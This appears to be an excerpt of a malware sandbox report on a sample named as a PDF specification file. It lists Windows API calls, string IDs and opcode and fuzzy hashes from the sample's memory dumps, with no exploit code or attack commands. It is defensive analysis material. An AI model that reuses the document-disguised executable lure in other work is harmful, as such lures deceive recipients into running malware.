                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00397A08
                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00397A13
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00397A1E
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00397A29
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00397A34
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00397A3F
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00397A4A
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00397A55
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00397A60
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00397A6B
                                      • GetCursorInfo.USER32(?), ref: 00397A7B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Cursor$Load$Info
                                      • String ID:
                                      • API String ID: 2577412497-0
                                      • Opcode ID: 694829a61f14b06ba95ccbcea83713461934d0e091c4bc68ec55f874e73e4d9e
                                      • Instruction ID: 1b130968be9272ff62e6572bb23cec31e4df6dd993529a517a355476f572175b
                                      • Opcode Fuzzy Hash: 694829a61f14b06ba95ccbcea83713461934d0e091c4bc68ec55f874e73e4d9e
                                      • Instruction Fuzzy Hash: 663105B1D4831A6ADF119FB68C8995FBFE8FF04750F50453AE50DE7281DA78A5008FA1
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 003A71FC
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003A7247
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 3974292440-4258414348
                                      • Opcode ID: c80c94c9f1e605d485f74bf290907829681397bcd3d309ca07bbebe63d56caae
                                      • Instruction ID: 9c89048318e965a8e0b3b03471a0f1eb01f4f4b0b3658b8309ec7472eaf7cafd
                                      • Opcode Fuzzy Hash: c80c94c9f1e605d485f74bf290907829681397bcd3d309ca07bbebe63d56caae
                                      • Instruction Fuzzy Hash: 7B915D342086019BCB16EF20C891A6EB7E5EF95310F01885DFD965F7A2DB35ED0ACB81
                                      APIs
                                      • EnumChildWindows.USER32(?,0037CF50), ref: 0037CE90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ChildEnumWindows
                                      • String ID: 4+?$CLASS$CLASSNN$H+?$INSTANCE$L+?$NAME$P+?$REGEXPCLASS$T+?$TEXT
                                      • API String ID: 3555792229-2490583668
                                      • Opcode ID: 2d39a9b6fff271e29b683ba1af4af483c50d2d6876bb9f64f57d0d5eec66136c
                                      • Instruction ID: 4a2bb34ad5da400e001ffca32fcc130f889408ea8bd9e6035e09632547b61d6a
                                      • Opcode Fuzzy Hash: 2d39a9b6fff271e29b683ba1af4af483c50d2d6876bb9f64f57d0d5eec66136c
                                      • Instruction Fuzzy Hash: 2191913061050AABCB2ADF60C481BEAFBB5BF04300F54D51DE95DAB551DF34A99ACBD0
                                      APIs
                                      • DestroyWindow.USER32(?,?), ref: 003ACF73
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003ACFF4
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003AD016
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AD025
                                      • DestroyWindow.USER32(?), ref: 003AD042
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00340000,00000000), ref: 003AD075
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AD094
                                      • GetDesktopWindow.USER32 ref: 003AD0A9
                                      • GetWindowRect.USER32(00000000), ref: 003AD0B0
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003AD0C2
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003AD0DA
                                        • Part of subcall function 0035B526: GetWindowLongW.USER32(?,000000EB), ref: 0035B537
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 1652260434-3619404913
                                      • Opcode ID: 94be17654b0db67ba8c045c16fa1c8cd016cc1224ab7645e66319d3cceb9ab89
                                      • Instruction ID: c6e2130b3dc8896fd1a3756a632261699c0fab780b05e397009c2779a3256c7a
                                      • Opcode Fuzzy Hash: 94be17654b0db67ba8c045c16fa1c8cd016cc1224ab7645e66319d3cceb9ab89
                                      • Instruction Fuzzy Hash: DB71DFB0140305AFD722CF28CC85FA677E9FB89704F44492DF9869B2A1DB35E942CB16
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003AE5AB
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003ABEAF), ref: 003AE607
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE647
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE68C
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE6C3
                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,003ABEAF), ref: 003AE6CF
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003AE6DF
                                      • DestroyIcon.USER32(?,?,?,?,?,003ABEAF), ref: 003AE6EE
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003AE70B
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003AE717
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 1446636887-1154884017
                                      • Opcode ID: 306d49ce2621c0426b0cb58505c8eec9925d14c25b0cefbbae91a2f60ff6d9de
                                      • Instruction ID: 742b4c65c9a6934e2c3ec08a649afd0fbad1888905ee502d16be8042959b6063
                                      • Opcode Fuzzy Hash: 306d49ce2621c0426b0cb58505c8eec9925d14c25b0cefbbae91a2f60ff6d9de
                                      • Instruction Fuzzy Hash: 1A61CF71500215BAEB26DF64CC46FBE77ACFB1A714F108615F915EA0E1EBB0E980CB60
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • DragQueryPoint.SHELL32(?,?), ref: 003AF37A
                                        • Part of subcall function 003AD7DE: ClientToScreen.USER32(?,?), ref: 003AD807
                                        • Part of subcall function 003AD7DE: GetWindowRect.USER32(?,?), ref: 003AD87D
                                        • Part of subcall function 003AD7DE: PtInRect.USER32(?,?,003AED5A), ref: 003AD88D
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003AF3E3
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003AF3EE
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003AF411
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003AF458
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003AF471
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 003AF488
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 003AF4AA
                                      • DragFinish.SHELL32(?), ref: 003AF4B1
                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003AF59C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                      • API String ID: 221274066-3440237614
                                      • Opcode ID: 2865a2c9f20b6dfb4c302c7821f9df1c4730997015217ea3a598d49f39086c71
                                      • Instruction ID: c6baa9641be7134ff092253bb59d60627e2fd312a92699374e38bc11b0f64025
                                      • Opcode Fuzzy Hash: 2865a2c9f20b6dfb4c302c7821f9df1c4730997015217ea3a598d49f39086c71
                                      • Instruction Fuzzy Hash: B1613C71508304AFC316DF64CC85D9FBBF8EF89710F404A2EF695961A1DB71A609CB52
                                      APIs
                                      • CharLowerBuffW.USER32(?,?), ref: 0038D292
                                      • GetDriveTypeW.KERNEL32 ref: 0038D2DF
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D327
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D35E
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D38C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: SendString$BuffCharDriveLowerType
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 1600147383-4113822522
                                      • Opcode ID: f84590f0de5a066e584e14a46c43776b93f3a8df65cad2c9e90aeebffd0ee4da
                                      • Instruction ID: 3b827cb8fe581c93abc0ed1dc24a2966ddee087777841fbaad2400664db9bee8
                                      • Opcode Fuzzy Hash: f84590f0de5a066e584e14a46c43776b93f3a8df65cad2c9e90aeebffd0ee4da
                                      • Instruction Fuzzy Hash: 57514C755047059FC702EF11C88196EB7E8EF99714F10486DF886AB2A1DB71EE0ACB42
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003ABEF4,?,?), ref: 003AE754
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE76B
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE776
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE783
                                      • GlobalLock.KERNEL32(00000000), ref: 003AE78C
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE79B
                                      • GlobalUnlock.KERNEL32(00000000), ref: 003AE7A4
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE7AB
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003ABEF4,?,?,00000000,?), ref: 003AE7BC
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,003CD9BC,?), ref: 003AE7D5
                                      • GlobalFree.KERNEL32(00000000), ref: 003AE7E5
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 003AE809
                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003AE834
                                      • DeleteObject.GDI32(00000000), ref: 003AE85C
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003AE872
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3840717409-0
                                      • Opcode ID: 90e742fd12fe5f9a37dd3013e9b5857326f799871122e257e25b595b1921d990
                                      • Instruction ID: c867fe0c6de31c15ee0560f62a82c1a845bfb9b11ae441fa9b6a0c81145e7567
                                      • Opcode Fuzzy Hash: 90e742fd12fe5f9a37dd3013e9b5857326f799871122e257e25b595b1921d990
                                      • Instruction Fuzzy Hash: 8A413A75600204FFDB129F65DC48EAABBBCEF8AB11F104468F905D7260D735AD41DB60
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 0038AB3D
                                      • VariantCopy.OLEAUT32(?,?), ref: 0038AB46
                                      • VariantClear.OLEAUT32(?), ref: 0038AB52
                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0038AC40
                                      • VarR8FromDec.OLEAUT32(?,?), ref: 0038AC9C
                                      • VariantInit.OLEAUT32(?), ref: 0038AD4D
                                      • SysFreeString.OLEAUT32(00000016), ref: 0038ADDF
                                      • VariantClear.OLEAUT32(?), ref: 0038AE35
                                      • VariantClear.OLEAUT32(?), ref: 0038AE44
                                      • VariantInit.OLEAUT32(00000000), ref: 0038AE80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                      • API String ID: 1234038744-3931177956
                                      • Opcode ID: ded74f5dd73ddae5c4581c212d0b8308622737fbbc621e86f8801cd3686da65d
                                      • Instruction ID: d0464086f354161bffc2ede770456dc978555c60f9255d279da3cb452a3f9378
                                      • Opcode Fuzzy Hash: ded74f5dd73ddae5c4581c212d0b8308622737fbbc621e86f8801cd3686da65d
                                      • Instruction Fuzzy Hash: C7D1FE71A00B05DBEF23AF65C884B6AB7B9FF04700F1584A6E8059F590DB70EC44DBA2
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: $E?$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 3964851224-1016100088
                                      • Opcode ID: 3366fb4f8b9b295463a4911f8482509a8074cb676cf06a159f4400b491dd8be6
                                      • Instruction ID: f8e90384901d19ae562fa84e83bdfda071a3fa850a44779aeb92a29af93f0c06
                                      • Opcode Fuzzy Hash: 3366fb4f8b9b295463a4911f8482509a8074cb676cf06a159f4400b491dd8be6
                                      • Instruction Fuzzy Hash: F0413B3411024A8BCF07EF14D851AEB3365EF23340F514865FC956F2A2EB70EA4ACB50
                                      APIs
                                        • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                        • Part of subcall function 0037ABBB: GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                        • Part of subcall function 0037ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                        • Part of subcall function 0037ABBB: HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                        • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                        • Part of subcall function 0037AC56: GetProcessHeap.KERNEL32(00000008,0037A6B5,00000000,00000000,?,0037A6B5,?), ref: 0037AC62
                                        • Part of subcall function 0037AC56: HeapAlloc.KERNEL32(00000000,?,0037A6B5,?), ref: 0037AC69
                                        • Part of subcall function 0037AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0037A6B5,?), ref: 0037AC7A
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0037A8CB
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0037A8FF
                                      • GetLengthSid.ADVAPI32(?), ref: 0037A910
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0037A94D
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0037A969
                                      • GetLengthSid.ADVAPI32(?), ref: 0037A986
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0037A995
                                      • HeapAlloc.KERNEL32(00000000), ref: 0037A99C
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0037A9BD
                                      • CopySid.ADVAPI32(00000000), ref: 0037A9C4
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0037A9F5
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0037AA1B
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0037AA2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 1795222879-0
                                      • Opcode ID: 88be91a9b8f1059385e12bb0b41b0701e793e30de096489c723642fade13c0af
                                      • Instruction ID: dc4b1dd3540a7bd6bbb80fea157af3c986e89ea2203c1110344ed7a22aba5386
                                      • Opcode Fuzzy Hash: 88be91a9b8f1059385e12bb0b41b0701e793e30de096489c723642fade13c0af
                                      • Instruction Fuzzy Hash: 01514B71900619ABDF22DF94DD45EEEBB79FF48300F048129F915EB290D7389A15CB61
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003AEF3B
                                      • GetFocus.USER32 ref: 003AEF4B
                                      • GetDlgCtrlID.USER32(00000000), ref: 003AEF56
                                      • GetMenuItemInfoW.USER32 ref: 003AF0AC
                                      • GetMenuItemCount.USER32(00000000), ref: 003AF0CC
                                      • GetMenuItemID.USER32(?,00000000), ref: 003AF0DF
                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 003AF113
                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 003AF15B
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003AF193
                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003AF1C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                      • String ID: 0
                                      • API String ID: 1026556194-4108050209
                                      • Opcode ID: c311d31d9cb3f6c35060d11e79bfe12ddc08c4bccca3ce81d718827cc8a7da09
                                      • Instruction ID: c118fa3f28f5c6f248c1af544dc5339da8f0344686dc9b301d4de187874a10a6
                                      • Opcode Fuzzy Hash: c311d31d9cb3f6c35060d11e79bfe12ddc08c4bccca3ce81d718827cc8a7da09
                                      • Instruction Fuzzy Hash: 7B817B71608301AFDB22CF54CC84E6BBBE9FB8A314F01492EF99997291D771D905CB92
                                      APIs
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00387B42
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00387B58
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00387B69
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00387B7B
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00387B8C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: SendString
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 890592661-1007645807
                                      • Opcode ID: 249e6d147301ab719f5aabee2efe75357469dfc72c779a1c869b392157d9c388
                                      • Instruction ID: 40aebea6e854e3eb30376271a99cdf79985711f00e30c51b4c1fa4d8290d4a27
                                      • Opcode Fuzzy Hash: 249e6d147301ab719f5aabee2efe75357469dfc72c779a1c869b392157d9c388
                                      • Instruction Fuzzy Hash: 3A11C4B0A5025D79D723B761CC4ADFFBABDEB91B40F100419B511AA0D1DA706A49CAB0
